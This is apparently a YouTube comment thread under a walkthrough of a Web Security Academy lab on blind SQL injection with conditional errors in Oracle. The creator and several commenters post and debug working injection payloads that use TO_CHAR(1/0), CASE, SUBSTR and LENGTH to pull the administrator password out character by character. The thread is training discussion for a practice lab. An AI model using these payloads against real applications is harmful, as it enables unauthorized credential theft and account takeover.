Interested in supporting me and gaining early access to the Web Security Academy videos when they're recorded? Consider buying my course: academy.ranakhalil.com/p/web-security-academy-video-series! ✨ ✨
@RanaKhalil101 3 years ago
After recording the video, I realized the SQL payload can be much simpler. We don't need a CASE expression in order for it to work. The following is the alternative payload: ' || (select TO_CHAR(1/0) FROM users WHERE username='administrator' and SUBSTR(password,1,1)='a')|| '
@ahmedsaleem9327 3 years ago
Great video. Can we use AND instead of concatenation? I am unable to understand why we haven't used AND.
@mileke0 1 year ago
@@ahmedsaleem9327 Yes. AND works as well.
@vinigreen 3 months ago
How does this ' || (select TO_CHAR(1/0) FROM users WHERE username='administrator' and SUBSTR(password,1,1)='a')|| ' --- work exactly? I mean, I think that if the SUBSTR is true then you will select the 1/0 and get the error message, which is what we want. But in the case that the password 1,1 is not A, then the clause is false, which also leads to an error, right? So how does this work?
@ZTechSecurity 1 month ago
Why can't we use ' and (select ...)--? I am confused at this point: ' and (select TO_CHAR(1/0) FROM users WHERE username='administrator')-- shows an error whether the table or value exists or not. Please explain a little.
@souravpaul_per 1 day ago
Thank you, ma'am. I think this comment should be pinned at the top.
@Zephyr-tg9hu 2 years ago
Noticed that there were a couple of people who were wondering why the solution for this lab uses concatenation: it doesn't matter what technique you use; this lab simply introduces a new technique that uses string concatenation instead of an equality check. You could just as easily do this lab using previous techniques. E.g. instead of:
'||(SELECT CASE WHEN (1=2) THEN to_char(1/0) ELSE '' END FROM dual)||'
we could have:
' AND (SELECT CASE WHEN (1=2) THEN to_char(1/0) ELSE '' END FROM dual)=''--
Concatenation simply leads to a simpler solution in this case, so it is quicker to use.
@anirudhsaxena9214 1 year ago
||(select+username+from+users+where+username%3d'administrator')|| This statement doesn't give an internal error; that means administrator exists in the table, right?
@user-h8m 1 year ago
@@anirudhsaxena9214 I guess the purpose here is to get an error. If you do not get it, the condition is true and passes to the second part of the condition --> ' ' = blank. It means that everything is alright and the administrator user does not exist.
@alla-turca 11 months ago
Could we use the same payload as the previous video instead of trying to do 1/0 or the CASE keyword? For example we did "and (select username from users where username = 'administrator') = 'administrator'--". Wouldn't this work here as well? If not, why?
@souravpaul_per 1 day ago
Thank you for explaining that.
@mih4743 1 year ago
Excellent video. My eWPT cert is in 4 weeks, so I can't thank you enough for your videos & the effort of quality educational content you put out. The method I found I'm able to learn with, regardless of it being tedious (the method, not the content), allows retention for those struggling with the information sticking, because this stuff is hard lol, but you've done us a great service.
Method:
1. Solo attempt
2. Watch video (as a lecture)
3. Re-attempt (still without video)
4. Complete with video (side by side)
5. 3rd attempt (without the video)
@sscoconut1265 9 months ago
Did you pass, bro?
@shamanwolf1335 4 months ago
I had a hard time understanding why we still get an error while 1=1 and we have a user called administrator. Then you explained how SQL queries worked and bingo! I instantly understood! Thank you so much!!
@mahmoudchiboub8213 3 years ago
Hi, can you please tell me why we needed to use the concatenation operator in this case and why we didn't use the comment operator to ignore the apostrophe?
@MohammedAhmed-id1ry 2 years ago
You can do it with AND; it probably won't make much difference, but this is another technique.
@x7331x 11 months ago
Amazing explanation of why the query for finding if the admin user exists works. Keep it up 👆 !
@marcschweiz 2 years ago
Great stuff, Rana. I bought your course to support you! Thank you for your time on these videos...
@RanaKhalil101 2 years ago
Thank you for your support!
@nishanahmed5318 3 years ago
Eagerly waited for your walkthrough.
@melisaozen4897 9 months ago
Perfect, love your detailed explanations! Thank you ☺ 🙏
@vuongnguyenminh9584 2 years ago
Thank you so much for these videos, they are easy to understand and learn!
@BigHeadEddie 3 years ago
I did the lab before this one called "Blind SQL injection with conditional responses". I didn't have to concatenate in that lab. I am not sure why concatenation was necessary in this lab. Can you explain?
@0xPr3d4T0r 2 years ago
Underrated channel👏
@Abhishekn._ 3 years ago
Nice explanations, waiting for the rest of the videos also.
@acronproject 1 year ago
Thanks for this, Ms. Khalil.
@padaloni 3 years ago
Great video. It's really refreshing listening to a female voice in pentesting videos. So much nicer on the ears :) Also your explanations are on point and simple to understand. Keep it up :)
@masicre9574 2 years ago
It will be really helpful if you could make a video to get a clear idea on DOM XSS.
@iluzdd 2 years ago
Great work, your videos are really helpful. I just didn't understand why you decided to concatenate. Is this an obvious move for blind SQLi?
@lollocanzo5633 11 months ago
Hey, I have a question. Since in this case it's an Oracle database, not knowing the syntax, after having found the parameter vulnerable to injection and having made sure that it was vulnerable by seeing whether it interpreted what was passed as a query, I passed everything to sqlmap, obviously specifying the injection point. Is this a good thing in your opinion?
@starchild_3693 3 years ago
Salamu Alaykoum Rana, how are you? What an amazing walkthrough, you make it seem as if it was so easy! Unbelievable skills. Thank you by the way. Do you recommend learning SQL? I don't have much SQL knowledge. Thank you again.
@7Arunkumar 1 year ago
Hi @rana Khali, I did watch your basic video. In the previous video we used conditional responses and now we are using a different one. Can we use the old method as well?
@brunuusamadio 2 years ago
Thanks, amazing video!!
@nvssairam5754 3 years ago
Why can't we follow the same steps here that we follow in Blind SQLi with conditional responses? Because the difference between conditional errors and responses is that there, if true, we get a WELCOME message, else NO MESSAGE, but here, if true, NO ERROR, else ERROR. TYIA
@ahmedsaleem9327 3 years ago
Same question.
@user-h8m 1 year ago
I guess because the DB is Oracle based
@eladbruchim2148 2 years ago
Hey Rana, thanks for that amazing video explanation! Can you please explain how the 'TO_CHAR' function manifests in the query?
@PeterCoder02 7 months ago
Hi, Ms. Khalil. Can you help me figure out the difference between conditional response and conditional errors in SQL Injection, please? This confused me. Thanks.
@user-h8m 1 year ago
I barely understood the logic of this kind of SQL injection in Oracle... but what I would like to know is whether there is the same error triggering for SQL databases?
@mohdaadilf 1 year ago
Here's a very peculiar error:
'|| (select CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM users where username = 'administrator' and LENGTH(password>100) ||--
Using comments at the end with the concatenation doesn't work. However, what does work is using comments without the concatenation string:
' || (select CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM users where username = 'administrator' and LENGTH(password>100) --
Anyone know why that is?
@nadir2k 3 years ago
Did you just reupload this?
@RanaKhalil101 3 years ago
Nope. This is the short version that will be linked to from the official Web Security Academy website.
@siddhant50 3 years ago
Great!
@thinhdang9256 1 year ago
Can someone explain to me why this challenge doesn't use -- at the end of the sentence like other challenges?
@zzzzzzzzZzZZzzzaZzz 1 year ago
How do I know the type of database?
@feritkardal 2 years ago
08:30 I didn't understand why it doesn't work without rownum and why we used rownum=1.
@ZoMbiE4CoBRA 1 year ago
Because the query will return ' ' for every entity in the users table, the returned result will be like this, for example if there are 3 users:
rownum | value
1 | ' '
2 | ' '
3 | ' '
It is important to note that by that I mean the ' ' in the select statement (select ' ' from users).
@hackerninjaking2617 1 year ago
It took me three days to solve this lab 😅😅😅
@wahid_cyril9244 2 years ago
How to exploit a MySQL database? Please give me a video for exploiting MySQL databases 🙏
@anirudhsaxena9214 1 year ago
Can someone explain to me the significance of ' ' and not '? Please, I am confused by that.
@user-h8m 1 year ago
I guess the ' ' means that everything is ok and does not display any message if the first condition is true... So it returns HTTP 200.
@adilhashmi7608 6 months ago
We can perform these attacks using the ffuf tool.
@vaibhavsuri2389 1 year ago
Hi Rana, thanks for sharing such helpful videos, but I need your help with this challenge. I am using the below queries to find the password length:
' || (select CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM users where username = 'administrator' and LENGTH(password>1) ||
' || (select CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM users where username = 'administrator' and LENGTH(password>50) ||
In both cases I am getting a 500 response. I am following the same steps which you did in this video; can you please help me with this issue?
@mohdaadilf 1 year ago
Have you closed the query? From what you've posted, the syntax is wrong. You've an open quote-mark, but haven't closed it. Either add a single quote, or comment out after the length function without concatenation:
' || (select CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM users where username = 'administrator' and LENGTH(password>1) || '
or
' || (select CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM users where username = 'administrator' and LENGTH(password>1) --
@milosmarkovic4566 1 year ago
Just add ' at the end of the query
@melantheoszimurri9981 8 months ago
Why are you using solutions that go more in line with what the labs are teaching? There's no way a beginner is going to know all of these different commands you are using.